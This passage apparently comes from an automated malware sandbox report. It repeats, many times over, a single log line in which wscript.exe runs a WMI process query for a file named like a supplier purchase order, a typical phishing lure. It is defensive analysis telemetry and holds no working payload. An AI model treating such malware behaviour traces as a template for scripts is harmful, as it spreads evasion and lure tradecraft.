                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
